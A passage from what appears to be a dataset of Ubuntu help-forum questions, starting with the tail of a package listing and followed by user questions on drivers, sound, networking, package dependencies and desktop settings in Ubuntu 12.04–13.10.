rc libhcrypto4-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - crypto library rc libheimbase1-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - base library rc libheimntlm0-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - ntlm support library rc libhx509-5-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - x509 support library rc libibus-1.0-0 : i386 1.4.1-3ubuntu1 intelligent input bus - shared library rc libice6 : i386 2:1.0.7-2build1 x11 inter-client exchange library rc libidn11 : i386 1.23-2 gnu libidn library , implementation of ietf idn specifications rc libiec61883-0 : i386 1.2.0-0.1ubuntu1 an partial implementation of iec 61883 rc libieee1284-3 : i386 0.2.11-10build1 cross-platform library for parallel port access rc libjack-jackd2-0 : i386 1.9.8~dfsg.1-1ubuntu2 jack audio connection kit ( libraries ) rc libjasper1 : i386 1.900.1-13 jasper jpeg-2000 runtime library rc libjpeg-turbo8 : i386 1.1.90+svn733-0ubuntu4.2 ijg jpeg compliant runtime library . rc libjson0 : i386 0.9-1ubuntu1 json manipulation library - shared library rc libk5crypto3 : i386 1.10+dfsg~beta1-2ubuntu0.3 mit kerberos runtime libraries - crypto library rc libkeyutils1 : i386 1.5.2-2 linux key management utilities ( library ) rc libkrb5-26-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - libraries rc libkrb5-3 : i386 1.10+dfsg~beta1-2ubuntu0.3 mit kerberos runtime libraries rc libkrb5support0 : i386 1.10+dfsg~beta1-2ubuntu0.3 mit kerberos runtime libraries - support library rc liblcms1 : i386 1.19.dfsg-1ubuntu3 little cms color management library rc libldap-2.4-2 : i386 2.4.28-1.1ubuntu4.4 openldap libraries rc libllvm3.0 : i386 3.0-4ubuntu1 low-level virtual machine ( llvm ) , runtime library rc libllvm3.1 : i386 3.1-2ubuntu1~12.04.1 low-level virtual machine ( llvm ) , runtime library rc libllvm3.2 : i386 3.2-2ubuntu5~precise1 low-level virtual machine ( llvm ) , runtime library rc libltdl7 : i386 2.4.2-1ubuntu1 a system independent dlopen wrapper for gnu libtool rc libmad0 : i386 0.15.1b-7ubuntu1 mpeg audio decoder library rc libmikmod2 : i386 3.1.12-2 portable sound library rc libmng1 : i386 1.0.10-3 multiple-image network graphics library rc libmpg123-0 : i386 1.12.1-3.2ubuntu1 mpeg layer 1/2/3 audio decoder -- runtime library rc libmysqlclient18 : i386 5.5.32-0ubuntu0.12.04.1 mysql database client library rc libnspr4 : i386 4.9.5-0ubuntu0.12.04.1 netscape portable runtime library rc libnss3 : i386 3.14.3-0ubuntu0.12.04.1 network security service libraries rc libodbc1 : i386 2.2.14p2-5ubuntu3 odbc library for unix rc libogg0 : i386 1.2.2~dfsg-1ubuntu1 ogg bitstream library rc libopenal1 : i386 1:1.13-4ubuntu3 software implementation of the openal api ( shared library ) rc liborc-0.4-0 : i386 1:0.4.16-1ubuntu2 library of optimized inner loops runtime compiler rc libosmesa6 : i386 8.0.4-0ubuntu0.6 mesa off-screen rendering extension rc libp11-kit0 : i386 0.12-2ubuntu1 library for loading and coordinating access to pkcs # 11 modules - runtime rc libpango1.0-0 : i386 1.30.0-0ubuntu3.1 layout and rendering of internationalized text rc libpixman-1-0 : i386 0.24.4-1 pixel-manipulation library for x and cairo rc libproxy1 : i386 0.4.7-0ubuntu4.1 automatic proxy configuration management library ( shared ) rc libpulse-mainloop-glib0 : i386 1:1.1-0ubuntu15.4 pulseaudio client libraries ( glib support ) rc libpulse0 : i386 1:1.1-0ubuntu15.4 pulseaudio client libraries rc libqt4-dbus : i386 4:4.8.1-0ubuntu4.4 qt 4 d-bus module rc libqt4-declarative : i386 4:4.8.1-0ubuntu4.4 qt 4 declarative module rc libqt4-designer : i386 4:4.8.1-0ubuntu4.4 qt 4 designer module rc libqt4-network : i386 4:4.8.1-0ubuntu4.4 qt 4 network module rc libqt4-opengl : i386 4:4.8.1-0ubuntu4.4 qt 4 opengl module rc libqt4-qt3support : i386 4:4.8.1-0ubuntu4.4 qt 3 compatibility library for qt 4 rc libqt4-script : i386 4:4.8.1-0ubuntu4.4 qt 4 script module rc libqt4-scripttools : i386 4:4.8.1-0ubuntu4.4 qt 4 script tools module rc libqt4-sql : i386 4:4.8.1-0ubuntu4.4 qt 4 sql module rc libqt4-svg : i386 4:4.8.1-0ubuntu4.4 qt 4 svg module rc libqt4-test : i386 4:4.8.1-0ubuntu4.4 qt 4 test module rc libqt4-xml : i386 4:4.8.1-0ubuntu4.4 qt 4 xml module rc libqt4-xmlpatterns : i386 4:4.8.1-0ubuntu4.4 qt 4 xml patterns module rc libqtcore4 : i386 4:4.8.1-0ubuntu4.4 qt 4 core module rc libqtgui4 : i386 4:4.8.1-0ubuntu4.4 qt 4 gui module rc libqtwebkit4 : i386 2.2.1-1ubuntu4 web content engine library for qt rc libraw1394-11 : i386 2.0.7-1ubuntu1 library for direct access to ieee 1394 bus ( aka firewire ) rc libroken18-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - roken support library rc librsvg2-2 : i386 2.36.1-0ubuntu1 sax-based renderer library for svg files ( runtime ) rc librtmp0 : i386 2.4~20110711.gitc28f1bab-1 toolkit for rtmp streams ( shared library ) rc libsamplerate0 : i386 0.1.8-4 audio sample rate conversion library rc libsane : i386 1.0.22-7ubuntu1 api library for scanners rc libsasl2-2 : i386 2.1.25.dfsg1-3ubuntu0.1 cyrus sasl - authentication abstraction library rc libsdl-image1.2 : i386 1.2.10-3 image loading library for simple directmedia layer 1.2 rc libsdl-mixer1.2 : i386 1.2.11-7 mixer library for simple directmedia layer 1.2 , libraries rc libsdl-net1.2 : i386 1.2.7-5 network library for simple directmedia layer 1.2 , libraries rc libsdl-ttf2.0-0 : i386 2.0.9-1.1ubuntu1 ttf library for simple directmedia layer with freetype 2 support rc libsdl1.2debian : i386 1.2.14-6.4ubuntu3 simple directmedia layer rc libshout3 : i386 2.2.2-7ubuntu1 mp3/ogg vorbis broadcast streaming library rc libsm6 : i386 2:1.2.0-2build1 x11 session management library rc libsndfile1 : i386 1.0.25-4 library for reading/writing audio files rc libsoup-gnome2.4-1 : i386 2.38.1-1 http library implementation in c -- gnome support library rc libsoup2.4-1 : i386 2.38.1-1 http library implementation in c -- shared library rc libspeex1 : i386 1.2~rc1-3ubuntu2 the speex codec runtime library rc libspeexdsp1 : i386 1.2~rc1-3ubuntu2 the speex extended runtime library rc libsqlite3-0 : i386 3.7.9-2ubuntu1.1 sqlite 3 shared library rc libssl0.9.8 : i386 0.9.8o-7ubuntu3.1 ssl shared libraries rc libstdc++5 : i386 1:3.3.6-25ubuntu1 the gnu standard c++ library v3 rc libstdc++6 : i386 4.6.3-1ubuntu5 gnu standard c++ library v3 rc libtag1-vanilla : i386 1.7-1ubuntu5 audio meta-data library - vanilla flavour rc libtasn1-3 : i386 2.10-1ubuntu1.1 manage asn.1 structures ( runtime ) rc libtdb1 : i386 1.2.9-4 trivial database - shared library rc libthai0 : i386 0.1.16-3 thai language support library rc libtheora0 : i386 1.1.1+dfsg.1-3ubuntu2 the theora video compression codec rc libtiff4 : i386 3.9.5-2ubuntu1.5 tag image file format ( tiff ) library rc libtxc-dxtn-s2tc0 : i386 0~git20110809-2.1 texture compression library for mesa rc libunistring0 : i386 0.9.3-5 unicode string library for c rc libusb-0.1-4 : i386 2:0.1.12-20 userspace usb programming library rc libv4l-0 : i386 0.8.6-1ubuntu2 collection of video4linux support libraries rc libv4lconvert0 : i386 0.8.6-1ubuntu2 video4linux frame format conversion library rc libvisual-0.4-0 : i386 0.4.0-4 audio visualization framework rc libvorbis0a : i386 1.3.2-1ubuntu3 the vorbis general audio compression codec ( decoder library ) rc libvorbisenc2 : i386 1.3.2-1ubuntu3 the vorbis general audio compression codec ( encoder library ) rc libvorbisfile3 : i386 1.3.2-1ubuntu3 the vorbis general audio compression codec ( high level api ) rc libwavpack1 : i386 4.60.1-2 audio codec ( lossy and lossless ) - library rc libwind0-heimdal : i386 1.6~git20120311.dfsg.1-2ubuntu0.1 heimdal kerberos - stringprep implementation rc libwrap0 : i386 7.6.q-21 wietse venema 's tcp wrappers library rc libx11-6 : i386 2:1.4.99.1-0ubuntu2.2 x11 client-side library rc libx11-xcb1 : i386 2:1.4.99.1-0ubuntu2.2 xlib/xcb interface library rc libxau6 : i386 1:1.0.6-4 x11 authorisation library rc libxaw7 : i386 2:1.0.9-3ubuntu1 x11 athena widget library rc libxcb-dri2-0 : i386 1.8.1-1ubuntu0.2 x c binding , dri2 extension rc libxcb-glx0 : i386 1.8.1-1ubuntu0.2 x c binding , glx extension rc libxcb-render0 : i386 1.8.1-1ubuntu0.2 x c binding , render extension rc libxcb-shm0 : i386 1.8.1-1ubuntu0.2 x c binding , shm extension rc libxcb1 : i386 1.8.1-1ubuntu0.2 x c binding rc libxcomposite1 : i386 1:0.4.3-2build1 x11 composite extension library rc libxcursor1 : i386 1:1.1.12-1ubuntu0.1 x cursor management library rc libxdamage1 : i386 1:1.1.3-2build1 x11 damaged region extension library rc libxdmcp6 : i386 1:1.1.0-4 x11 display manager control protocol library rc libxext6 : i386 2:1.3.0-3ubuntu0.1 x11 miscellaneous extension library rc libxfixes3 : i386 1:5.0-4ubuntu4.1 x11 miscellaneous 'fixes ' extension library rc libxft2 : i386 2.2.0-3ubuntu2 freetype-based font drawing library for x rc libxi6 : i386 2:1.6.0-0ubuntu2.1 x11 input extension library rc libxinerama1 : i386 2:1.1.1-3ubuntu0.1 x11 xinerama extension library rc libxml2 : i386 2.7.8.dfsg-5.1ubuntu4.6 gnome xml library rc libxmu6 : i386 2:1.1.0-3 x11 miscellaneous utility library rc libxp6 : i386 1:1.0.1-2ubuntu0.12.04.1 x printing extension ( xprint ) client library rc libxpm4 : i386 1:3.5.9-4 x11 pixmap library rc libxrandr2 : i386 2:1.3.2-2ubuntu0.2 x11 randr extension library rc libxrender1 : i386 1:0.9.6-2ubuntu0.1 x rendering extension client library rc libxslt1.1 : i386 1.1.26-8ubuntu1.3 xslt 1.0 processing library - runtime library rc libxss1 : i386 1:1.2.1-2 x11 screen saver extension library rc libxt6 : i386 1:1.1.1-2ubuntu0.1 x11 toolkit intrinsics library rc libxtst6 : i386 2:1.2.0-4ubuntu0.1 x11 testing -- record extension library rc libxv1 : i386 2:1.0.6-2ubuntu0.1 x11 video extension library rc libxxf86vm1 : i386 1:1.1.1-2ubuntu0.1 x11 xfree86 video mode extension library rc odbcinst1debian2 : i386 2.2.14p2-5ubuntu3 support library for accessing odbc ini files rc skype-bin : i386 4.2.0.11-0ubuntu0.12.04.2 client for skype voip and instant messaging service - binary files rc sni-qt : i386 0.2.5-0ubuntu3 indicator support for qt rc wine-compholio : i386 1.7.4~ubuntu12.04.1 the compholio edition is a special build of the popular wine software rc xaw3dg : i386 1.5+e-18.1ubuntu1 xaw3d widget set
365966	how do you make it so when you click an app on the side it jumps to the opened app	i 'm not sure what i did but i had it so i could click on the icon that split it into 4 screens and throw whatever i wanted on whichever screen i wanted but i fiddled around with some stuff and made it so that now when i click on the app , say i have firefox open but it is n't on the active page , it does nothing . whereas before in the same situation when i clicked on the active app it would sling me across to whichever of the four screens it was located on ; how do i get back to this setting ?
365968	can not make caps lock a control key using setxkbmap	i am running ubuntu 13.10 and i want to make caps lock another control key . i found that the easiest way was using setxkbmap . but the strange thing is that it resets itself to the default after 1 minute or so , could somebody help me ?
365970	ubuntu 13.10 and dell inspiron 7520 se ( intel 4000 and ati radeon hd 7730m )	i installed 13.10 and i have problems with my display . everything else works fine . i cant control my brightness . i thought the graphics driver is the problem . so i went to software updates , switched to another driver ( proprietary ) and the ubuntu screen went black and i was n't able to boot either . i cant use my lap with such low brightness . then i reinstalled 13.10 again , this time full hdd reset . same problem occurred . i grabbed radeon hd7730m for linux x64 from the amd site , installed it , and the screen went black with only the `` x '' cursor showing on the next boot . what should i need to do to make my brightness work and stabilize graphic cards as mine is switchable graphics type .
365972	minecraft running slow after 13.10 upgrade	what to took for when minecraft is running slow ( ~10 fps ) after a simple ubuntu upgrade ( from 13.04 to 13.10 ) without any manual change in the hardware/software graphic configuration and in the minecraft configuration ? before the upgrade , it was running very well everytime ( ~60 fps constantly ) . any help ? lspci | grep `` vga compatible controller '' 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] whistler [ radeon hd 6730m/6770m/7690m xt ] ( rev ff )
365974	nautilus dbus error	when i try running nautilus i get this message : ( nautilus:24342 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( nautilus:24342 ) : glib-gobject-critical ** : g_object_set : assertion 'g_is_object ( object ) ' failed ( nautilus:24342 ) : glib-gobject-critical ** : g_object_set : assertion 'g_is_object ( object ) ' failed is there any way this can be fixed ?
365977	the last line in geany window is obscured	the last line of code in geany is semi-obscured : an underscore _ can not be seen , and other codes are just harder to view . i 'm using ubuntu 12.04 , geany 0.21 . is there a way to fix this ?
365978	failed to create symbolic link to keytool	keytool is /usr/bin/keytool and points to /etc/alternatives/keytool which in turn points to /usr/lib/jvm/java-6-openjdk-i386/jre/bin/keytool . now i have installed java version 1.7.0_45 so i need to change keytool to the new path : /usr/lib/jvm/jdk1.7.0_45/jre/bin/keytool i tried deleting the /usr/bin/keytool with rm -rf and then adding a new link like : sudo ln -s /usr/bin/keytool /usr/lib/jvm/jdk1.7.0_45/jre/bin/keytool but what i get is ln : failed to create symbolic link `/usr/lib/jvm/jdk1.7.0_45/jre/bin/keytool ' : file exists i also tried : sudo update-alternatives -- config keytool there is only one alternative in link group keytool : /usr/lib/jvm/java-6-openjdk-i386/jre/bin/keytool nothing to configure . update-alternatives : warning : forcing reinstallation of alternative /usr/lib/jvm/java-6-openjdk-i386/jre/bin/keytool because link group keytool is broken . but does n't works too . any suggestions ? thank you
365979	ubuntu 12.04 connected to wireless network but internet not working	i can connect to my house 's wireless network just fine , but when i 'm connected i ca n't browse the web . firefox starts connecting to a site and then just poops out . this does n't happen on my roommates ' computers ( running windows ) or on our 3dses , so i know it 's just my laptop . ( edited to remove irrelevant information ) this other user 's answer solved my problem . i would post this as an answer , but the site keeps converting it to a comment . thank you for all the suggestions , though !
365980	acer s3 ssd and hd deleted partitions ?	i 'm new to linux and ubuntu , and i think i have a problem . i have an acer aspire s3 with 20gb ssd and 320gb hd . i installed ubuntu 12.04 64bit on it today , and when it asked about partitions , without knowing better , i erased the partitions . there is some information at https : //help.ubuntu.com/community/aspires3 about using the ssd and hd efficiently , but since i deleted the partitions , i do n't know what to do . how can i recreate the partitions mentioned in the above link so that i can take advantage of having ssd and hd ? i installed gparted , but i do n't know what i should do now , and i do n't want to screw things up further . i greatly appreciate any help that can be offered me . edit : i was playing with gparted , and i just realized that i can see dev/sda and dev/sdb , so perhaps i did n't do something horrible to my partitions . i am also sorry for asking such ( dumb ? ) questions . at this point , is there a way to tell whether i have actually screwed up my partitions ? thanks , joe
365982	how can i uninstall mir ?	i followed the instructions here to install mir on my laptop on saucy 13.10 . ubuntu mir it works well except for a known bug which causes the laptop to go into low graphics after suspend . so for a while i would like to go back to default without mir . ubsure how i can exactly get this done . what packages do i need to install to get back to default ?
365984	installation problems through ubuntu bootable cd	i used infrarecorder to burn ubuntu on a cd and boot my computer , and i also managed to get the ubuntu logo to pop up after booting from the cd i made . i did the manual installation , but at the end it says mirror bad archive mirror . please help .
365986	ndiswrapper : disagrees about version of symbol module_layout	after updating my gateway to the latest 13.04 i am trying to trouble shoot why the wireless is not working , one of my steps included this output . can anyone help me here ? here is some more info hopefully it helps , let me know if you need anything else , thanks . lshw -c network *-network unclaimed description : ethernet controller product : 88w8362e [ topdog ] 802.11a/b/g/n wireless vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 03 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f600ffff memory : f4000000-f400ffff dmesg | grep -e ndis -e wlan [ 36.729213 ] ndiswrapper : disagrees about version of symbol module_layout [ 36.757407 ] ndiswrapper : disagrees about version of symbol module_layout [ 163.326607 ] rndis_host 2-2:1.0 usb0 : register 'rndis_host ' at usb-0000:00:1d.7-2 , rndis device , 02:50:56:54:61:61 [ 163.326826 ] usbcore : registered new interface driver rndis_host
365988	boxlight interactive projector drivers installing problem	i am using ubuntu 12.04 operating system . i try to install light pen and sp drivers software for `` box light '' projector.but it does n't work . ( i also tried login as root ' but no result ) pls tell me how to install this software ( manufactuter cd is included software for linux i tried with this ) scb
365992	installing mariadb when apt reports mariadb has unmet dependencies or broken packages	i have tried everything to install mariadb on this clean ubuntu installation but i keep getting this error , some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mariadb-server : depends : mariadb-server-5.5 ( = 5.5.33a+maria-1~saucy ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have followed this guide to try and install it , http : //www.unixmen.com/install-lemp-server-nginx-mysql-mariadb-php-ubuntu-13-10-server/ and i have also followed the `` official '' guide on the mariadb downloads page for 13.10 https : //downloads.mariadb.org/mariadb/repositories/ but nothing seems to be working . edit 1 i have tried both how do i resolve unmet dependencies ? and how to install mariadb ? but it still gives me the error i posted above . it 's a fresh ubuntu install with hardly anything installed . edit 2 all the check boxes are ticket in updates . i ran : sudo apt-get update & & sudo apt-get -f install mariadb-server-5.5 '' =5.5.33a+maria-1~saucy '' and it gave me this error : the following packages have unmet dependencies : mariadb-server-5.5 : depends : mariadb-client-5.5 ( > = 5.5.33a+maria-1~saucy ) but it is not going to be installed depends : mariadb-server-core-5.5 ( > = 5.5.33a+maria-1~saucy ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
365997	ubuntu ca n't access web pages , even though it 's connected to the internet	i recently just upgraded ubuntu 12.04 to 12.10 on my laptop ( i know , so late > _ > ) and immediately upon upgrading , my browser stopped loading webpages , throwing an error instantly after receiving a url to load . i tried pinging my dns server , and it returned all my pings , which i thought was strange . if the dns was working properly , why were n't pages loading ? i checked my wireless network configuration multiple times , but each time the same behaviour returned .
366001	ubuntu 13.10 grub 2.0	i know this question may have been asked hundreds of times before but there does n't seem to be one answer to how to solve it . i upgraded my computer to ubuntu 13.10 and my computer was low on battery , and i unplugged it from the charger and then the computer shut off . i 'm guessing it got into some corrupted state because now when i boot into ubuntu , all i see the is grub 2 menu : minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > i originally installed ubuntu with the wubi installer so i have a dual partition , one with windows 7 and the other with ubuntu 13.10 . what can i do to get out of the grub shell ?
366003	why does ubuntu 13.10 not detect my win7 partition ?	i 'm trying to install ubuntu 13.10 alongside windows 7 on my dell inspiron 14z 5423 laptop and i 'm new to all of this . i 'm using the ubuntu 13.10 64-bit iso burned onto a cd . the first time i tried to install it , ubuntu said it did not detect any other os , which meant i only had 4 options : erase disk and install ubuntu ( i do n't want to do this ) encrypt new ubuntu . use lvm . something else . if i choose the something else option , it brings me to the partition menu and says that i have 1 disk with free space of ( 500gb ) , but that 's not true because i have windows 7 . i restarted the laptop several times and booted the cd again and i got exactly the same as i did previously . how do fix this problem and install ubuntu alongside windows 7 ? after executing `` sudo fdisk -l '' command in terminal ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xd2b811c5 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 314574847 157184000 7 hpfs/ntfs/exfat /dev/sda3 314574848 629147647 157286400 7 hpfs/ntfs/exfat /dev/sda4 629147648 976771071 173811712 7 hpfs/ntfs/exfat after removing one partition i executed command once again ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xd2b811c5 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 629145599 314469376 7 hpfs/ntfs/exfat /dev/sda3 629147648 976771071 173811712 7 hpfs/ntfs/exfat i have win7 home perimum os it shows local drive as
366006	problems with ivtv and hauppauge pvr 500	hey i am in charge of figuring out a live internet broadcast we 're planning to do and i am having some problems with getting things set up . first a couple background things : why am i using ubuntu : i am using it because this live system is pretty old ( built in 05 , amd 3500+ , 2gb ram , nvidia 6800 ) and even though my hauppauge pvr 500 works great with windows , this system is too old to run anything past xp . plus when it comes down to it , linux vs windows , its a clear choice ) we are starting off in sd so this older system will work for now . why not use a newer system ? no money , and the hauppauge pvr 500 only supports systems under 4gb of ram now here is the problem , i am not super fermiler with linux when it comes to command line . but i am trying to get ivtv drivers to work so ubuntu will recognize my hauppauge pvr 500 . problem is when i download it from their website i keep getting this message when i try to extract it . tar : this does not look like a tar archive tar : skipping to next header tar : exiting with failure status due to previous errors how do i get past this problem and how do you install drivers on ubuntu ? btw i am running ubuntu 12.4 thanks for the help .
366009	mp4 to mpeg ts 2	i want to convert mp4 video to mpeg ts2 . what 's the best way to do it and preserve hd quality ? input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'how to get the newest smartphones from at & t - youtube.mp4 ' : metadata : major_brand : mp42 minor_version : 0 compatible_brands : isommp42 creation_time : 2013-09-12 01:05:48 duration : 00:01:03.53 , start : 0.000000 , bitrate : 1358 kb/s stream # 0:0 ( und ) : video : h264 ( high ) ( avc1 / 0x31637661 ) , yuv420p , 1280x720 , 1163 kb/s , 23.98 fps , 23.98 tbr , 48k tbn , 47.95 tbc metadata : handler_name : videohandler stream # 0:1 ( und ) : audio : aac ( mp4a / 0x6134706d ) , 44100 hz , stereo , fltp , 192 kb/s metadata : creation_time : 2013-09-12 01:05:49 handler_name : isomedia file produced by google , 5-11-2011
366010	ubuntu default wo n't load after installing cinnamon	i just installed cinnamon this morning , but i did n't like what i saw after i logged in . i logged out and tried logging in with ubuntu default , but it gives a `` ubuntu failed to load '' pop up error . i managed to uninstall cinnamon and i am now logged in through gnome fallback . i want to go back to default . how do i fix this ? please help .
366012	can not install software because of authentication problem in ubuntu 12.04	i am able to login into ubuntu 12.04 with the password i remember , but when i try to install a software my password is not accepted . in the user accounts it says none next to password . when i try to unlock in order to change my settings it would not let me . here is what i tried but did n't work : i changed my password through the grab menu . it seemed to accept the password , but the problem persists . furthermore , my login password did n't even change i tried to install different things , using sudo , according to posts i found on the internet but it would not let me install anything
366015	ubuntu touch for motorola razr ?	i would like know if ubuntu phone os ( ubuntu touch ) can be installed on motorola razr d1 xt914 ( arm cortex a9 1ghz , 1gb ram , etc. ) ? or is there some official place to look to find this out ? i do n't mind if the os runs slow . thanks for any help or input .
366016	how do i install a newer version of oracle jdk ?	using the guide here : http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux i have installed oracle 's jdk because it has a few features that are not present in openjdk . now , there some new features released in the early access of oracle 's jdk which i need . i have two questions pertaining to this : how do i completely get rid of oracle 's jdk ? how do i upgrade my current oracle jdk ? given that my knowledge is limited to the guide , i guess the changes will be after step 9 where i will have to replace jdk1.7.0_40 with the appropriate version . please help me with this = )
366017	getting an error when upgrading from 13.04 to 13.10,	i get the following error : a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_saucy_main_source_sources hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . i have connected to internet through wifi and internet is working perfectly . how do i fix this ?
366021	multi language font	is there any way or any font family that supports both english and persian language like tahoma ? i am a web developer and new in ubuntu , i want to write my code in english and persian language and it is important to me my code looks good .
366029	keyboard `` @ `` symbol not working . ubuntu 13.10	i recently installed ubuntu 13.10 , and updates it regularly . but i noticed from the start that i can not type `` @ '' symbol . i use a toshiba satellite c640 with i3 processor laptop . the number keys on the lap work fine . but all the symbols that one can access by pressing shift are randomised . and i can not find ' @ ' symbol . regards
366032	pulseaudio not detecting bluetooth headset automatically	the pavucontrol on my xubuntu 13.10 detects my bluetooth headset , but only after i type the commands : pulseaudio -k sudo alsa force-reload after a few seconds the headset appears in the configuration tab . i have also tried inserting the line load-module module-switch-on-connect in the /etc/pulse/default.pa but it does n't help . i have tried purging and autoremoving and reinstalling everything right from alsa to pulseaudio and pulseaudio-module-bluetooth . nothing works . is there a workaround to load the headset without using the command force-reload ? to make the pulseaudio daemon recognize the device automatically ? i tried adding : pcm.bluetooth { type bluetooth device `` xx : xx : xx : xx : xx : xx '' profile `` auto '' } to a file .asoundrc in my home directory but it does n't make a difference after killing the pulseaudio daemon , my even volume hotkeys stop working . i have to assign amixer set master 4 % - -q unmute amixer set master 4 % + -q unmute to some other key combination to manage the volume from keyboard . assigning the commands to the hotkeys does n't work . how are the volume keys bound to the daemon ? is there any other way of binding the keys to the new daemon ( after restarting ) ? update found the problem . using the command pactl list | grep -i module-bluetooth-discover i found out that the bluetooth discover module was not loaded . but my default.pa file in /etc/pulse contains the lines .ifexists module-bluetooth-discover.so load-module module-bluetooth-discover .endif so why does the module not load on pulseaudio startup ? after issuing the command sudo pactl load-module module-bluetooth-discover the bluetooth headset works properly and is detected automatically , without killing and restarting alsa .
366033	ubuntu 13.04 sound issue - pulseaudio starts twice	sound is not working when starting ubuntu . doing a ps -ef | grep pulseaudio lists two pulseaudio processes . killing one of them or doing a sudo alsa force-reload makes the sound work correctly . how can i find why is pulse audio starting twice and make it work without issuing an alsa force-reload every time the computer starts ? thank you
366034	ssh command history and `` autocomplete ''	i need to work with ubuntu server remotely using ssh . i have only basic knowledge about linux administration , so it is difficult to work from shell . but any way ... when i connected as root via ssh `` autocomplete '' for commands and folders using tab and storing of command history works fine . i created separate user account for me : sudo useradd andrew sudo adduser andrew sudo sudo passwd andrew after login as andrew server told me , that home directory for `` andrew '' does n't exsist , so sudo mkdir /home/andrew sudo chown andrew : andrew /home/andrew but neither `` autocomplete '' for commands and folders nor command history does n't work for this user is there any way to make it work ?
366035	12.04 lts boots into terminal and not desktop	i cant boot into my desktop . 12.04 boots into terminal with login screen . have tried all.. nvidia , lightdm , gdm , desktop , install , uninstall , upgrade. @ ! ! help
366038	wifi disconnects frequently	i am using thinkpad l410 laptop . my wireless card details are the following . rtl8191sevb wireless lan controller vendor : realtek semiconductor co. , ltd. wifi will get disconnected frequently . sometimes it disconnects many times even many times in a mintute . to resume the wifi , i need to uncheck `` enable wifi '' and check it again . why is this problem occuring ? wifi working fine in windows . please help me
366044	screen flickering after resuming from suspend	i am having some issues with my ubuntu system . i have unity installed ( the default that you get from ubuntu.com version 13.10 ) . when i resume from suspend , my screen flickers for a second and it seems like it has gotten worse . my laptop is fairly new and the stats are listed below . i have searched online and found others with similar problems and have not been able to find anything to try to fix it . so if anyone could help me out i would really appreciate it . processor : intel® core™ i5-3210m cpu @ 2.50ghz × 4 graphics : intel® ivybridge mobile os-type : 64-bit hard drive : ssd . laptop brand : asus . thank you so much ! .
366048	cpu requirements for the desktop ubuntu	i have a intel celeron cpu 900 @ 2.20ghz 2.19 ghz can this handle the desktop for ubuntu ive downloaded the 32 bit due to the 2gig ram and tried to run it on virtualbox first time did not work now i did and only to say cpu requirements
366049	why ubuntu 13.10 always show `` access prompt '' when start ?	after my ubuntu pc update from 13.04 to 13.10 , when start up , an access prompt always show and ask me password for `` my_email @ gmail.com '' . i was input password for email or another services , which registed with `` my_email @ gmail.com '' , but it 's still `` incorect '' . i can close but next time , it appears again . it never appeared before 13.10 . what is application show that prompt ? how can i turn off this ? here is access prompt ?
366057	how to add image at the background of terminal in ubuntu 13.04 ?	during customization i want to add an image as the terminal background .
366058	g++ v 4.8.1 does n't compile simple code , using thread header	i have ubuntu 13.10 64bit . the use of thread with the g++ v 4.8.1 compiler gives an error message : terminate called after throwing an instance of 'std : :system_error' what ( ) : enable multithreading to use std : :thread : operation not permitted aborted ( core dumped ) i can work around it passing -wl , -- no-as-needed https : //bugs.launchpad.net/ubuntu/+source/gcc-defaults/+bug/1228201 is there any stable version of g++ for ubuntu 64 bit ?
366059	if a juju ha cluster charm fails to deploy , will removing the ha cluster charm service mess up the service that was behind it ?	i deployed the havana version of openstack keystone , and an the also deployed the ha cluster charm for it and added a relation . it failed to deploy ( i assume because i failed to generate a key instead of using the default specified ) . if i just remove the keystone-hacluster service , will it leave the keystone service in a questionable state or will it clean up ? ( how does it do this if it is on the same machine ? )
366061	the ubuntu web app for gmail in saucy stopped appearing	the ubuntu web app for gmail in saucy stopped appearing in the unity launcher when `` mail.google.com '' is opened ... i 've tried uninstalling it ( through synaptic and even selecting the conf files of the app to be purged ) and then installing it again - no success . i 've also tried with a completely new firefox user account profile - no success . for ex. , the facebook ubuntu web app is working fine . the gmail web app can be found in dash but when you start it , `` mail.google.com '' is being opened in firefox and again no gmail web app in the unity launcher . any ideas ?
